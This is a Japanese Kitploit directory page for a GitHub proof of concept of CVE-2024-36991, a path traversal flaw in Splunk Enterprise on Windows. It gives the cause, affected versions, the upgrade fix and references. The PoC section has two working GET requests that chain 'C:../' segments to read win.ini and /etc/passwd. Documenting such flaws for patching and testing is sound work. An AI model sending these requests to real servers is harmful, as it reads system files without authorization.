Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-36991 — Windows上のSplunk Enterpriseにおける"/Modules/Messaging/"エンドポイントでのパストラバーサル | Kitploit
ツール/GitHubGitHub/mr-xn/cve-2024-36991
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubmr-xn/cve-2024-36991

CVE-2024-36991

Windows上のSplunk Enterpriseにおける"/Modules/Messaging/"エンドポイントでのパストラバーサル

リポジトリを見る
912年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2024-36991

Windows 上の Splunk Enterprise の "/Modules/Messaging/" エンドポイントにおけるパストラバーサル

9.2.2、9.1.5、9.0.10 未満の Splunk Enterprise バージョンにおいて、攻撃者は Windows 上の Splunk Enterprise の /modules/messaging/ エンドポイントに対してパストラバーサルを実行できる可能性があります。

この脆弱性は、Python の os.path.join 関数が、トークンのドライブが構築パスのドライブと一致する場合にパストークンからドライブ文字を削除するために存在します。

この脆弱性は Windows 上の Splunk Enterprise にのみ影響するはずです。

POC

root@kitploit:~
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd

Affected

  • 9.2 から 9.2.2 未満のバージョンが影響を受けます。
  • 9.1 から 9.1.5 未満のバージョンが影響を受けます。
  • 9.0 から 9.0.10 未満のバージョンが影響を受けます。

Solution

Splunk Enterprise をバージョン 9.2.2、9.1.5、9.0.10 以上にアップグレードしてください。

Credits

Danylo Dmytriiev (DDV_UA)

References

  • https://advisory.splunk.com/advisories/SVD-2024-0711
  • https://www.cve.org/CVERecord?id=CVE-2024-36991
ツールをダウンロード